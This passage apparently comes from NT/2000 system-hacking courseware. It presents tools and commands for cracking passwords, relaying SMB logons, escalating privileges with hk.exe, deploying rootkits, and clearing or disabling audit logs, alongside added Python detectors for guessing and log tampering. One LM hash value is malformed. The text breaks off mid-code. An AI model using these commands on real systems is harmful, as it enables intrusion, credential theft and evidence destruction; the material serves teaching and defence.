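    ("2003-06-21 09:00:14", 539, "administrator", "\\\\PEGASUS"),
    ("2003-06-21 09:30:00", 529, "jsmith", "\\\\JSMITH-PC"),   # one typo
    ("2003-06-21 09:30:20", 528, "jsmith", "\\\\JSMITH-PC"),   # then a successful logon
]


def detect_guessing(events, threshold: int = 5, window=timedelta(minutes=5)):
    """Return one alert per source workstation that produced `threshold` or
    more failures inside `window`.  Many users from one source is a spray;
    one user hammered from one source is a brute-force guess."""
    per_source = defaultdict(list)
    for ts, event_id, user, workstation in events:
        if event_id in FAILURE_EVENTS:
            when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
            per_source[workstation].append((when, event_id, user))

    alerts = []
    for workstation, failures in per_source.items():
        failures.sort()
        for i, (start, _, _) in enumerate(failures):
            j = i
            while j < len(failures) and failures[j][0] - start <= window:
                j += 1
            if j - i >= threshold:
                burst = failures[i:j]
                users = sorted({u for _, _, u in burst})
                alerts.append({
                    "source": workstation,
                    "failures": len(burst),
                    "users": users,
                    "lockouts": sum(1 for _, e, _ in burst if e == 539),
                    "pattern": "password spray" if len(users) > 1 else "brute force",
                    "first": start.isoformat(sep=" "),
                })
                break      # one alert per source is enough for a first pass
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_EVENTS):
        print(alert)
```

Two things to keep in mind when reading real logs: the source workstation name in a 529 is supplied by the client and can be forged, so correlate it with the source address from the network, and an attacker who knows lockout is on will stay under the threshold per account, which is exactly the spray pattern the per-source count still catches.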
Monitoring Event Viewer Logs

• Logging is of no use if no one ever analyzes the logs.
• VisualLast from www.foundstone.com formats the event logs visually.

(Screenshot: VisualLast. A "Browse List for KRASH" pane lists saved searches such as
  \\KRASH -f -u administrator -n 10
  \\KRASH -f -u administrator -from \\PEGASUS -n 10
  \\KRASH -f -from \\PEGASUS -n 10
  \\KRASH -s -from \\PEGASUS -n 10
  \\KRASH -s -n 10 -iis
i.e. the last 10 failed (-f) or successful (-s) logons on KRASH, optionally for one user (-u) or from one workstation (-from). The Visual Search dialog offers Search Options, Time Frame Options and a Server List: Logon Event (Last Successful Logons / Last Failed Attempts), Logon Type (Either Type / Interactive / Remote), User Name "administrator", Machine Name to Search "\\KRASH", Connected From "\\PEGASUS", an optional backup .evt file name, Verbose Mode, Search IIS Entries Only, Include NULL Logons, Number of Records, and Search / Cancel buttons; result columns include Connected From and Logon Domain.)

Password Sniffing

Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?

(Diagram: the attacker breaks into host1, which shares a segment with host2, host3 and host4, installs a sniffer, waits for logins, and later retrieves the sniffer logs.)

  1. Break in
  2. Install sniffer
  3. Wait for logins
  4. Retrieve logs

Sniffer logs:
  Login: John
  Password: 123

On a switched segment the sniffer sees only traffic addressed to its own port, which is why the SMB redirection and ARP poisoning techniques later in this module exist: they bring the victim's logon to the attacker instead of waiting for it.

Hacking Tool: L0phtcrack

• LC4 is a password auditing and recovery package distributed by @stake. Its SMB packet capture listens on the local network segment and captures individual login sessions.
• With the L0phtcrack password cracking engine, anyone who can sniff the wire for an extended period is almost guaranteed to obtain Administrator status in a matter of days, because the challenge/response captured from a classic LM logon is derived from the weak LM hash.

(Screenshot: @stake LC4 window listing Administrator, Guest and other accounts with their LM Password, NTLM Password and LM Hash columns, and the session options dialog:
  Dictionary Crack: tests for passwords that are the same as the words listed in the word file. This test is very fast and finds the weakest passwords.
  Dictionary/Brute Hybrid Crack: characters to prepend and to append, common letter substitutions (much slower). Tests for passwords that are variations of the words in the word file, such as "Dana99". This test is fast and finds weak passwords.
  Brute Force Crack with a selectable character set (A-Z, 0-9 and punctuation): tests for passwords that are made up of the characters specified in the character set. This test is slow and finds medium to strong passwords. Specify a character set with more characters to crack stronger passwords.)

Hacking Tool: KerbCrack

• KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a brute-force attack or a dictionary attack.
• What kerbsniff captures is the pre-authentication data of the AS-REQ (a timestamp encrypted with a key derived from the user's password), so the attack is an offline guess-and-verify against that ciphertext: it needs no further interaction with the KDC and triggers no lockout.

C:\WINNT\System32\cmd.exe
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>kerbcrack
KerbCrack 1.2 - (c) 2002, Arne Vidstrom
             - http://ntsecurity.nu/toolbox/kerbcrack/

Usage: kerbcrack <capture file> <crack mode> [dictionary file] [password size]

crack modes:
  -b1 = brute force attack with (a-z, A-Z)
  -b2 = brute force attack with (a-z, A-Z, 0-9)
  -b3 = brute force attack with (a-z, A-Z, 0-9, special characters)
  -b4 = b1 + Swedish letters
  -b5 = b2 + Swedish letters
  -b6 = b3 + Swedish letters
  -d  = dictionary attack with specified dictionary file

Privilege Escalation

• If an attacker gains access to the network using a non-admin user account, the next step is to gain higher privilege, to that of an administrator.
• This is called privilege escalation.

Tool: GetAdmin

• GetAdmin.exe is a small program that adds a user to the local Administrators group.
• It uses a low-level NT kernel routine to set a global flag allowing access to any running process.
• You need to log on to the server console to execute the program.
• GetAdmin.exe is run from the command line or from a browser.
• This only works on NT 4.0 up to Service Pack 3; the post-SP3 hotfix (and SP4) closed the hole.

Tool: hk.exe

• The hk.exe utility exploits a Local Procedure Call (LPC) flaw in NT: through NtImpersonateClientOfPort it impersonates a thread of lsass, which runs as SYSTEM, and runs the supplied command under that token.
• A non-admin user can therefore add themselves to the Administrators group using hk.exe:

c:\>net localgroup administrators peter /add
Access Denied

c:\>hk net localgroup administrators peter /add
lsass pid & tid are: 47 - 48
NtImpersonateClientOfPort succeeded

Manual Password Cracking Algorithm

• Find a valid user.
• Create a list of possible passwords.
• Rank the passwords from high probability to low.
• Key in each password.
• If the system allows you in: success.
• Else try until success (or until the account locks out, which is the practical limit of manual guessing).

Automatic Password Cracking Algorithm

• Find a valid user.
• Find the hashing (or encryption) algorithm used.
• Obtain the hashed passwords.
• Create a list of possible passwords.
• Hash each word.
• See if there is a match for each user ID.
• Repeat steps 1 through 6.

This is an offline attack: once the hashes are in hand, no further contact with the target is needed and nothing is logged there.

Password Types

• Passwords that contain only letters.
• Passwords that contain only numbers.
• Passwords that contain only special characters.
• Passwords that contain letters and numbers.
• Passwords that contain only letters and special characters.
• Passwords that contain only special characters and numbers.
• Passwords that contain letters, special characters and numbers.

Types of Password Attacks

• Dictionary attack
• Brute force attack
• Hybrid attack
• Social engineering
• Shoulder surfing
• Dumpster diving

Cracking NT/2000 Passwords

• The SAM file in Windows NT/2000 contains the user names and hashed passwords. The SAM file is located in the %systemroot%\system32\config directory.
• The file is locked while the OS is running.
  • Boot to an alternate OS
    - NTFSDOS (www.sysinternals.com) will mount any NTFS partition as a logical drive.
  • Back up the SAM from the Repair directory
    - Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%\repair. Expand this file using c:\>expand sam._ sam
  • Extract the hashes from the SAM
    - Use L0phtcrack to crack the hashes.
• On Windows 2000 (and on NT 4.0 once SYSKEY is enabled) the hashes inside the SAM are additionally encrypted with a key held in the SYSTEM hive, so the SYSTEM hive is needed as well before the hashes can be cracked.

Redirecting SMB Logon to the Attacker

• Eavesdropping on LM responses becomes much easier if the attacker can trick the victim into attempting Windows authentication to a server of the attacker's choice.
• The basic trick is to send an e-mail message to the victim with an embedded hyperlink to a fraudulent SMB server.
• When the hyperlink is clicked, the user unwittingly sends his credentials over the network: the client answers the rogue server's challenge with an LM/NTLM response computed from the user's password hash, without any prompt.

(Diagram: the attacker e-mails the victim "Hello John, click this link"; the link points at the attacker's SMB server; the victim's client sends its logon credentials (user name and challenge response) to it; the attacker cracks those hashes with L0phtcrack; "Connection established to the victim's PC using hashed credentials".)

Hacking Tool: SMBRelay

• SMBRelay is essentially an SMB server that can capture user names and password hashes from incoming SMB traffic.
• It can also perform man-in-the-middle (MITM) attacks.
• On the attacker's machine you must first disable NetBIOS over TCP/IP and block ports 139 and 445, so that Windows' own SMB server does not hold the ports SMBRelay needs to listen on.
• Start the SMBRelay server and listen for SMB packets (/E lists the interfaces and their index numbers; /IL and /IR select the listening and relay interfaces):
  • c:\>smbrelay /E
  • c:\>smbrelay /IL 2 /IR 2
• An attacker can access the client machine by simply connecting to it via the relay address using: c:\>net use * \\<capture_ip>\c$

SMBRelay Man-in-the-Middle Scenario

• The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, and a target server address of 192.168.234.34 with /T:

c:\>smbrelay /IL 2 /IR 2 /R 192.168.234.252 /T 192.168.234.34

• When a victim client connects to the fraudulent server thinking it is talking to the target, the MITM server intercepts the call, records the challenge/response (to be cracked later) and passes the authentication through to the target server, so that the attacker ends up holding an authenticated session to the target as the victim.

SMB Relay Weakness & Countermeasures

© The problem is to convince a victim's client to authenticate to the MITM server.

© You can send a malicious e-mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address.

© Another solution is an ARP poisoning attack against the entire segment, causing all of the systems on the segment to authenticate through the fraudulent MITM server.
Countermeasures

© Configure Windows 2000 to use SMB signing.

© Client and server will then cryptographically sign each block of SMB communications between them.

© These settings are found under Security Policies / Security Options.


Hacking Tool: SMBGrind

SMBGrind increases the speed of L0phtcrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually.

[Screenshot: "Untitled.lc - SMB Grinder" window with columns Username, NT Hash, LanMan Hash and Challenge, listing the accounts Administrator, BillG, foura, fredc, threea and twoa with their captured hashes; the status bar reads "Duplicate Entries Removed: 0".]
Hacking Tool: SMBDie

© The SMBDie tool crashes computers running Windows 2000/XP/NT by sending a specially crafted SMB request.

[Screenshot: SMBdie v0.1. The tool's own description reads: "What is SMBdie? It's a proof of concept tool. Is it possible to crash Windows computers by sending a specially crafted SMB request. What computers are vulnerable? Windows NT/2k/XP/.NET RC1 with NETBIOS enabled. Author: zamolx3@personal.ro". Input fields: Computer (IP address) 192.168.20.109; NETBIOS name MAHYCO-SERVER. Link: "Call to arms - Information anarchy" (http://www.nmrc.org/InfoAnarchy/InfoAnarchy.htm). Status pane:]

Connecting to remote computer ... (port 139)
Connected.
Session established.
Protocol negotiated.
NULL session established.
Operating System : Windows 2000
Connected to IPC$.
Sending exploit ...
Done.
Hacking Tool: NBTDeputy

© NBTDeputy registers a NetBIOS computer name on the network and is ready to respond to NetBT name-query requests.

© NBTDeputy helps to resolve an IP address from a NetBIOS computer name. It is similar to Proxy ARP.

© This tool works well with SMBRelay.

© For example, SMBRelay runs on a computer as ANONYMOUS-ONE with the IP address 192.168.110, and NBTDeputy is also run with 192.168.110 specified. SMBRelay may then connect to any XP or .NET server when the logged-on users access "My Network Places".



NetBIOS DoS Attack

© Sending a 'NetBIOS Name Release' message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict so that the system will no longer be able to use it.

© This will block the client from participating in the NetBIOS network.

© Tool: nbname

• NBName can disable entire LANs and prevent machines from rejoining them.

• Nodes on a NetBIOS network infected by the tool will think that their names already are being used by other machines.
Hacking Tool: John the Ripper

© It is a command line tool designed to crack both Unix and NT passwords. John is extremely fast and free.

© The resulting passwords are case insensitive (LM hashes are computed from the uppercased password) and may not represent the real mixed-case password.
What is LanManager Hash?

Example: Let's say your password is: '123456qwerty'

© When this password is encrypted with the LM algorithm, it is first converted to all uppercase: '123456QWERTY'

© The password is padded with null (blank) characters to make it 14 characters long: '123456QWERTY__'

© Before encrypting this password, the 14 character string is split into halves: '123456Q' and 'WERTY__'

© Each string is individually encrypted and the results concatenated.

© '123456Q' = 6BF11E04AFAB197F

'WERTY__' = F1E9FFDCC75575B15

© The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15

Note: The first half of the hash contains alpha-numeric characters and it will take 24 hrs to crack by L0phtcrack, and the second half only takes 60 seconds.
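The split into two independent 7-byte halves is what makes the note above true, and it is also something a defender can check for in a dumped SAM. The following Python is an added example, not courseware or L0phtCrack code: it performs only the preprocessing steps described above (uppercase, pad, split), estimates the work per half from the character classes present, and flags accounts whose LM hash ends in the well-known constant AAD3B435B51404EE, the value produced by an all-null second half, i.e. a password of 7 characters or fewer. The DES step itself is omitted; the sample hash dump is constructed and reuses the first-half value 6BF11E04AFAB197F from the slide.

```python
"""LM hash preprocessing, per-half work estimate and short-password check.

Added example (not from the courseware or L0phtCrack). Reproduces the
uppercase / pad-to-14 / split-into-7-byte-halves steps described on the
slide and shows why each half is attacked independently. The DES
encryption of "KGS!@#$%" under each half is not implemented here.
"""
import string
from typing import Dict, List, Tuple

# Well-known LM hash of an all-null 7-byte half: appears as the second
# 16 hex digits whenever the password is 7 characters or shorter.
EMPTY_HALF_HASH = "AAD3B435B51404EE"


def lm_halves(password: str) -> Tuple[bytes, bytes]:
    """Uppercase, truncate/pad to 14 bytes with nulls, split into two halves."""
    data = password.upper().encode("ascii", "replace")[:14].ljust(14, b"\x00")
    return data[:7], data[7:]


def _alphabet_size(chars: bytes) -> int:
    """Size of the smallest standard character set covering `chars`."""
    size = 0
    if any(chr(c) in string.digits for c in chars):
        size += 10
    if any(chr(c) in string.ascii_uppercase for c in chars):
        size += 26
    if any(chr(c) in string.punctuation for c in chars):
        size += len(string.punctuation)
    return size


def half_keyspace(half: bytes) -> int:
    """Candidates an attacker must try for one half (trailing nulls are free)."""
    chars = half.rstrip(b"\x00")
    return _alphabet_size(chars) ** len(chars) if chars else 1


def split_advantage(password: str) -> Tuple[int, int]:
    """(work to crack the two halves separately,
        work if the 14-byte string had to be attacked as one unit)."""
    first, second = lm_halves(password)
    separately = half_keyspace(first) + half_keyspace(second)
    whole = (first + second).rstrip(b"\x00")
    as_one = _alphabet_size(whole) ** len(whole)
    return separately, as_one


def short_password_accounts(hash_dump: Dict[str, str]) -> List[str]:
    """Accounts whose LM hash second half is the empty-half constant."""
    return sorted(
        user for user, lm in hash_dump.items()
        if len(lm) == 32 and lm.upper()[16:] == EMPTY_HALF_HASH
    )


if __name__ == "__main__":
    # Constructed sample dump: "alice" has the slide's first-half value
    # followed by the empty-half constant, so her password is <= 7 chars.
    dump = {
        "alice": "6BF11E04AFAB197F" + "AAD3B435B51404EE",
        "bob": "6BF11E04AFAB197F" + "0123456789ABCDEF",  # constructed
    }
    print(lm_halves("123456qwerty"))
    print(split_advantage("123456qwerty"))
    print(short_password_accounts(dump))
```

Accounts returned by short_password_accounts() are the cheapest to crack, and split_advantage() shows the gap between attacking two short halves and one long string. The practical remedy, beyond the countermeasures on the next slide, is to stop storing LM hashes at all (the NoLMHash policy setting on Windows 2000 and later).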
Password Cracking Countermeasures

© Enforce 7-12 character alpha-numeric passwords.

© Set the password change policy to 30 days.

© Physically isolate and protect the server.

© Use the SYSKEY utility to store hashes on disk.

© Monitor the server logs for brute force attacks on user accounts.
Keystroke Loggers

© If all other attempts to sniff out domain privileges fail, then a keystroke logger is the solution.

© Keystroke loggers are stealth software that sits between the keyboard hardware and the operating system, so that they can record every keystroke.

© There are two types of keystroke loggers:

• 1. Software based and

• 2. Hardware based.
View Log Options

[Screenshot: a keylogger's "View Log Options" dialog. Select configuration: Normal; Normal with special keys; Full detail report; Only letters. What to view?: Normal characters (A..z, Space, Enter); Special keys (F1..F12, Shift, Alt, arrow keys, etc); Backspaces (marked as "<"); Titles of active window; Window time; Periodic time stamps (time logged every few minutes). View the log: On / All / Start on, with a February 2003 calendar and "Start on 2003-2-9". Buttons: Save options, Cancel, View log now, Help.]

Anti-keylogger

[Screenshot: Anti-keylogger status window: "Anti-keylogger is now scanning for keystroke monitoring programs currently running on your system. This could take a few minutes. Please be patient." with a Cancel button.]
Spyware: Spector (www.spector.com)

© Spector is spyware and it will record everything anyone does on the internet.

© Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With Spector, you will be able to see exactly what your surveillance targets have been doing online and offline.

© Spector works by taking a snapshot of whatever is on your computer screen and saving it away in a hidden location on your computer's hard drive.

[Screenshot: "Spector Toolbar Screen Shot - Microsoft Internet Explorer", showing the Spector viewer toolbar with Export, Print, Fit View, Back, Forward, Last and Events controls.]
Hacking Tool: eBlaster (www.spector.com)

© eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

© eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

© Within seconds of them sending or receiving an email, you will receive your own copy of that email.

[Screenshot: eBlaster 3.0 Control Panel, Reports tab. Report Delivery: On / Off. Send Email Report To: To eblaster@yahoo.com, CC, BCC. Report Format: HTML / Plain Text. Report Sending Interval: Send Every N Minutes, or Once a day at 2:44:59 PM. Email Identification (Optional): From "eBlaster - Johns Laptop", Subject "eBlaster Activity Report". Inactivity Timeout in minutes. Delivery Method: via SpectorSoft Server / via Custom Server (Options). Buttons: Uninstall, Test Email, Save, Cancel.]
IKS Software Keylogger

[Screenshot: "Datview - Binary Log Translator for IKS". Filters: Filter Out Arrow Keys; Filter Out Ctrl and Alt Keys; Filter Out F1 to F12 Keys; Filter Out All Other Function Keys. Viewer: Use Notepad / Translate to Text Only. Clear Log: Clear Binary Log Upon Exit / Clear Text Log Upon Exit. Import Binary Log From: c:\winnt\iks.dat. Save Text Log To: c:\temp\iks.txt. Button: Go!]
Hacking Tool: Hardware Key Logger (www.keyghost.com)

© The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

© It keeps a record of all keystrokes typed on the keyboard. The recording process is totally transparent to the end user.
Anti Spector (www.antispector.de)

© This tool will detect Spector and remove it from your system.

[Screenshot: Anti Spector (www.antispector.de) window, with each message shown in English and German: "This tool recognizes an installed surveillance tool called SPECTOR." "SPECTOR is not installed." "If SPECTOR is installed, please click on REMOVE for removing SPECTOR." Buttons: Remove / Entfernen, Close / Schliessen.]
Hacking Tool: RootKit

© What if the very code of the operating system came under the control of the attacker?

© The NT/2000 rootkit is built as a kernel mode driver which can be dynamically loaded at run time.

© The NT/2000 rootkit runs with system privileges, right at the core of the NT kernel, so it has access to all the resources of the operating system.

© The rootkit can also:

• hide processes (that is, keep them from being listed)

• hide files

• hide registry entries

• intercept keystrokes typed at the system console

• issue a debug interrupt, causing a blue screen of death

• redirect EXE files
© The rootkit contains a kernel mode device driver, called _root_.sys, and a launcher program, called deploy.exe.

© After gaining access to the target system, the attacker will copy _root_.sys and deploy.exe onto the target system and execute deploy.exe.

© This will install the rootkit device driver and start it up. The attacker later deletes deploy.exe from the target machine.

© The attacker can then stop and restart the rootkit at will by using the commands net stop _root_ and net start _root_.

© Once the rootkit is started, the file _root_.sys stops appearing in the directory listings. The rootkit intercepts the system calls for listing files and hides all files beginning with _root_ from display.



Rootkit Countermeasures

© Back up critical data (not binaries!). Wipe everything clean and reinstall the OS/applications from a trusted source.

© Don't rely on backups, because you could be restoring from trojaned software.

© Keep a well documented, automated installation procedure.

© Keep availability of trusted restoration media.

[Screenshot: "AFX Windows Rootkit 2003" generator, with tabs Processes, Files, Registry and Connections; the Processes list contains lum.exe, sub7.exe, bionet.exe and sdbot.exe; buttons Generate, Help and About; footer links to the author's site and http://www.megasecurity.org.]
Covering Tracks

© Once intruders have successfully gained Administrator access on a system, they will try to cover the detection of their presence.

© When all the information of interest has been stripped from the target, they will install several back doors so that easy access can be obtained in the future.

Disabling Auditing

C:\> auditpol.exe /disable
Running ...
Local audit information changed successfully.
New local audit policy ...
(0) Audit Disabled
AuditCategorySystem = No
AuditCategoryLogon = Failure
AuditCategoryObjectAccess = No

C:\> auditpol.exe /enable
Auditing enabled successfully.

© The first thing intruders will do after gaining Administrator privileges is to disable auditing.

© The NT Resource Kit's auditpol.exe tool can disable auditing from the command line.

© At the end of their stay, the intruders will just turn on auditing again using auditpol.exe.
© Intruders can easily wipe out the logs in the Event Viewer.

© Event Viewer on the attacker's host can open, read and clear logs of the remote host.

© This process will clear all records from the logs but will leave one record stating that the event log has been cleared by 'Attacker'.
© The elsave.exe utility is a simple tool for clearing the event log. The following syntax will clear the security log on the remote server 'rovil' (correct privileges are required on the remote system):

c:\> elsave -s \\rovil -l "Security" -C

© Save the system log on the local machine to d:\system.log and then clear the log:

elsave -l system -F d:\system.log -C

© Save the application log on \\serv1 to \\serv1\d$\application.log:

elsave -s \\serv1 -F d:\application.log
Hacking Tool: WinZapper

© WinZapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000.

© To use the program, the attacker runs winzapper.exe and marks the event records to be deleted, then presses 'Delete events' and 'Exit'. Presto, the events disappear.

© To sum things up: after an attacker has gained Administrator access to the system, one simply cannot trust the security log!
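Each of the techniques on the last few slides (auditpol /disable followed by /enable, clearing the log from Event Viewer, elsave) leaves either a trace or a gap a defender can look for, provided the Security log is exported or forwarded off the host regularly. The Python below is an added example, not part of the courseware or of any of those tools: it scans a comma-separated export of the NT/2000 Security log for event 612 (audit policy changed) and event 517 (audit log cleared), and reports any pair of policy changes with nothing logged between them, which is exactly the footprint of the disable/enable sequence shown above. The export lines are constructed for the example and reuse the server name 'rovil' from the elsave slide.

```python
"""Spot audit-policy changes and log clearing in an NT/2000 Security log.

Added example (not courseware code and not any product's code). Input is a
comma-separated export in the shape date,time,source,category,event_id,
user,computer. Event IDs 612 (audit policy changed) and 517 (audit log
cleared) are the Windows NT/2000 Security log identifiers for those
actions. SAMPLE_EXPORT below is constructed for the example.
"""
from typing import List

AUDIT_POLICY_CHANGED = 612
AUDIT_LOG_CLEARED = 517

# Constructed sample: an admin logon, auditing turned off at 10:16,
# silence until it is turned back on at 11:48, then the log is cleared.
SAMPLE_EXPORT = """\
2003-02-09,10:02:11,Security,Logon/Logoff,528,ROVIL\\john,ROVIL
2003-02-09,10:15:40,Security,Logon/Logoff,528,ROVIL\\Administrator,ROVIL
2003-02-09,10:16:02,Security,Policy Change,612,ROVIL\\Administrator,ROVIL
2003-02-09,11:48:55,Security,Policy Change,612,ROVIL\\Administrator,ROVIL
2003-02-09,11:49:10,Security,System Event,517,ROVIL\\Attacker,ROVIL
2003-02-09,11:50:00,Security,Logon/Logoff,538,ROVIL\\Administrator,ROVIL
"""


def parse_export(text: str) -> List[dict]:
    """Turn the export into a list of records in file order."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, source, category, event_id, user, computer = line.split(",", 6)
        records.append({
            "when": f"{date} {time}",
            "source": source,
            "category": category,
            "event_id": int(event_id),
            "user": user,
            "computer": computer,
        })
    return records


def find_tampering(records: List[dict]) -> List[str]:
    """One finding per suspicious record, plus one for any two consecutive
    policy changes with no other event between them (auditing was off)."""
    findings: List[str] = []
    last_policy_change = None
    events_since_change = 0
    for rec in records:
        eid = rec["event_id"]
        if eid == AUDIT_LOG_CLEARED:
            findings.append(f"{rec['when']}: security log cleared by {rec['user']}")
        if eid == AUDIT_POLICY_CHANGED:
            findings.append(f"{rec['when']}: audit policy changed by {rec['user']}")
            if last_policy_change is not None and events_since_change == 0:
                findings.append(
                    f"{last_policy_change['when']} to {rec['when']}: no events "
                    "between two policy changes (auditing likely disabled)")
            last_policy_change = rec
            events_since_change = 0
        else:
            events_since_change += 1
    return findings


if __name__ == "__main__":
    for finding in find_tampering(parse_export(SAMPLE_EXPORT)):
        print(finding)
```

This catches the wholesale techniques; it cannot catch WinZapper's selective deletions, which remove individual records without leaving a 517. That is the reason to forward Security log events to another host as they occur rather than trusting the copy on the compromised machine, which is the point the slide makes.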
© Evidence Eliminator is an easy to use, powerful and flexible data cleansing system for Windows PCs.

© Daily use protects you from unwanted data becoming permanently hidden in your PC.

© It cleans recycle bins, Internet cache, system files, temp folders etc.
Evidence Eliminator

[Screenshot: Evidence Eliminator v5.0 main window (Safe Restart, Quick Mode, Test Mode, Options). Task / Status list: Generating random data (Done); Recycle Bin on C:\ (Done); Drive Scan With Mask C:\ (Analyzing...); Windows Swap File; Windows Application Logs; Common Dialog [Last Visited]; Common Dialog [Open/Save]. Log pane:]

Disabling any selected Screen Saver ... <OK>
Generating random data ... <OK>
Eliminating Folder: C:\recycled\
Scanning C:\recycled\ for mask *.* ... please wait ... <OK>
Files found: 3
Eliminating File: C:\recycled\desktop.ini <Skipped system file>
Eliminating File: C:\recycled\DC15.GIF <P1>[0]<NAME><ZERO><KILL><OK>
Eliminating File: C:\recycled\INFO2 <P1>[0]<NAME><ZERO><KILL><OK>
Eliminated 2 file(s)
Eliminating folder tree: C:\recycled\ excluding root folder ... <OK>
Drive Scan no. 1 C:\
Scanning C:\ for mask *.tmp ... please wait.

[Buttons: Stop Work, Help, Clear Log, Copy Log, Save Log.]
Hiding Files

© There are two ways of hiding files in NT/2000.

• 1. Attrib

- use attrib +h [file/directory]

• 2. NTFS Alternate Data Streaming

- The NTFS file system used by Windows NT, 2000 and XP has a feature, Alternate Data Streams, that allows data to be stored in hidden files that are linked to a normal visible file.

© Streams are not limited in size and there can be more than one stream linked to a normal file.
Creating Alternate Data Streams

© Start by going to the command line and typing notepad test.txt

© Put some data in the file, save the file, and close Notepad.

© From the command line, type dir test.txt and note the file size.

© Next, go to the command line and type notepad test.txt:hidden.txt. Type some text into Notepad, save the file, and close.

© Check the file size again and notice that it hasn't changed!

© If you open test.txt, you see your original data and nothing else.

© If you use the type command on the filename from the command line, you still get the original data.

© If you go to the command line and type type test.txt:hidden.txt you get an error.
Tools: ADS creation and detection

makestrm.exe moves the physical contents of a file to its stream.

DiamondCS MakeStream Demo - http://www.diamondcs.com.au
x.org successfully converted to x.org:StreamTest

© ads_cat from Packet Storm is a utility for writing to NTFS's Alternate File Streams and includes ads_extract, ads_cp, and ads_rm, utilities to read, copy, and remove data from NTFS alternate file streams.

© Mark Russinovich at www.sysinternals.com has released the freeware utility Streams, which displays NTFS files that have alternate streams content.

© Heysoft has released LADS (List Alternate Data Streams), which scans the entire drive or a given directory. It lists the names and size of all alternate data streams it finds.
NTFS Streams Countermeasures

© Deleting a stream file involves copying the 'front' file to a FAT partition, then copying it back to NTFS.

© Streams are lost when the file is moved to a FAT partition.

© LNS.exe (http://ntsecurity.nu/cgi-bin/download/lns.exe.pl) can detect streams.



Stealing Files using Word Documents

© Anyone who saves a Word document has a potentially new security risk to consider - one that no current anti-virus or Trojan scanner will turn up.

© The contents of the files on a victim's hard drive can be copied and sent outside your firewall without their even knowing.

© The threat takes advantage of a special feature of Word called field codes.

© Here's how it might work: Someone sends the victim a Word document with a field-code bug. The victim opens the file in Word, saves it (even with no changes), then sends it back to the originator.
© Use Hidden Field Detector. It's available free at: http://www.woodyswatch.com/util/sniff/

© Hidden Field Detector upon installation will install itself on your Word Tools menu.

© It scans your documents for potentially troublesome field codes, which you can't see easily, and even warns you when it finds something suspicious.
[Screenshot: "Spyware Sample.doc - Microsoft Word" with the Tools menu open (Spelling and Grammar, Language, Word Count, Speech, Letters and Mailings, Tools on the Web, Options) and the entry added by Hidden Field Detector; the document body is a sample letter that is illegible in the capture.]
What is Steganography?

© The process of hiding data in images is called Steganography.

© The most popular method for hiding data in files is to utilize graphic images as the hiding place.

© Attackers can embed information such as:

1. Source code for a hacking tool

2. List of compromised servers

3. Plans for future attacks

4. Your grandma's secret cookie recipe
Tool: ImageHide

© ImageHide is a steganography program. It can hide loads of text in images.

© Simple encrypt and decrypt of data.

© Even after adding bytes of data, there is no increase in image size.

© The image looks the same to normal paint packages.

© Loads and saves to files and gets past all the mail sniffers.

[Screenshot: "Image Hide - Dancemammal.com" (Copyright (c) 2001 Dancemammal); menu File, Edit, Image, Tools, Window; an image loaded from a path under C:\Documents and Settings; buttons Read, Write, Encrypt, Decrypt; text box containing "This is to demo hiding text using ImageHide"; status "Hidden text space in bytes: 24185".]
Tool: MP3Stego

© MP3Stego will hide information in MP3 files during the compression process.

© The data is first compressed, encrypted and then hidden in the MP3 bit stream.

[Screenshot: C:\WINDOWS\System32\cmd.exe]

Z:\Development\MP3Stego>encode -E hidden_text.txt -P pass svega.wav svega_stego.mp3
MP3StegoEncoder 1.1.15
See README file for copyright info
Microsoft RIFF, WAVE audio, PCM, mono 44100Hz 16bit, Length: 0: 0:20
MPEG-I layer III, none Psychoacoustic Model: AT&T
Bitrate=128 kbps De-emphasis: none CRC: off
Encoding "svega.wav" to "svega_stego.mp3"
Hiding "hidden_text.txt"
[Frame 791 of 791] <100.00%> Finished in 0: 0: 6

Z:\Development\MP3Stego>decode -X -P pass svega_stego.mp3
MP3StegoEncoder 1.1.15
See README file for copyright info
Input file = 'svega_stego.mp3' output file = 'svega_stego.mp3.pcm'
Will attempt to extract hidden information. Output: svega_stego.mp3.txt
the bit stream file svega_stego.mp3 is a BINARY file
HDR: s=FFF, id=1, l=3, ep=off, br=9, sf=0, pd=1, pr=0, m=3, js=0, c=0, o=0, e=0
alg.=MPEG-1, layer=III, tot bitrate=128, sfrq=44.1
mode=single-ch, sblim=32, jsbd=32, ch=1
[Frame 791]Avg slots/frame = 417.434; b/smp = 2.90; br = 127.839 kbps
Decoding of "svega_stego.mp3" is finished
The decoded PCM output file name is "svega_stego.mp3.pcm"
Z:\Development\MP3Stego>
Tool: Snow.exe

© Snow is a whitespace steganography program and is used to conceal messages in ASCII text by appending whitespace to the end of lines.

© Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. If the built-in encryption is used, the message cannot be read even if it is detected.

To encode the message into a file (myfile.doc):

snow -m "Swiss bank a/c: 3453434" -p "password-123" myfile.doc myfile2.doc

To extract the message, the command would be:

snow -p "password-123" myfile2.doc
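How trailing-whitespace hiding works, and the simple check that exposes it, as an added example. This is not snow's code and does not use snow's bit layout (snow packs bits differently and adds compression and encryption), so it will not decode real snow output; here one message bit becomes one trailing character per line, a space for 0 and a tab for 1, eight per line. The carrier text is constructed, and the hidden message reuses the slide's sample string.

```python
"""Whitespace steganography: minimal hide/reveal plus a defender's check.

Added example, not snow's code or file format. Each byte of the message is
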